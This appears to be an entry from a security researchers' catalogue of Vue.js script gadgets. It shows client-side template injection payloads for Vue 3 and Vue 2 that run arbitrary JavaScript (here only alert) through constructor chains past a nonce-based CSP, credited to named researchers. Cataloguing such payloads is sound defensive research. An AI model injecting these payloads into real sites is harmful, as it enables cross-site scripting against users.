Vue.js is an MIT-licensed open source project with its ongoing development made possible entirely by the support of these awesome backers. If you’d like to join them, please consider sponsoring Vue’s development.
This is not the full list of different CSTI payloads. The full list can be found here.
<!-- user input -->
<div id="app">
  <p>{{_openBlock.constructor("alert(1)")()}}</p>
  <p>{{_createBlock.constructor("alert(2)")()}}</p>
  <p>{{_toDisplayString.constructor("alert(3)")()}}</p>
  <p>{{_createVNode.constructor("alert(4)")()}}</p>
  <p v-show=_createBlock.constructor`alert(5)`()></p>
  <x></x>
  <teleport></teleport>
</div>
<script nonce="secret" src="https://unpkg.com/vue@3/dist/vue.global.js"></script>
<script nonce="secret">
  const app = Vue.createApp({
    data() { return { input: "# hello" }}
  })
  app.mount("#app");
</script>
Found by @garethheyes, @LewisArdern, @PwnFunction.
This is not the full list of different CSTI payloads. The full list can be found here.
The author of this gadget is cure53berlin, but since many other gadgets were found by other hackers, I’ve listed all of them as authors for this gadget.
<!-- user input -->
<div id="app">
  <p>{{constructor.constructor("alert(document.domain)")()}}</p>
</div>
<script nonce="secret" src="https://cdn.jsdelivr.net/npm/vue@2/dist/vue.js"></script>
<script nonce="secret">
  new Vue({
    el: "#app",
    data: {}
  });
</script>
Found by @cure53berlin, @garethheyes, @slekies, @LewisArdern, @PwnFunction, @sirdarckcat, @kkotowicz, @davwwwx, @p4fg.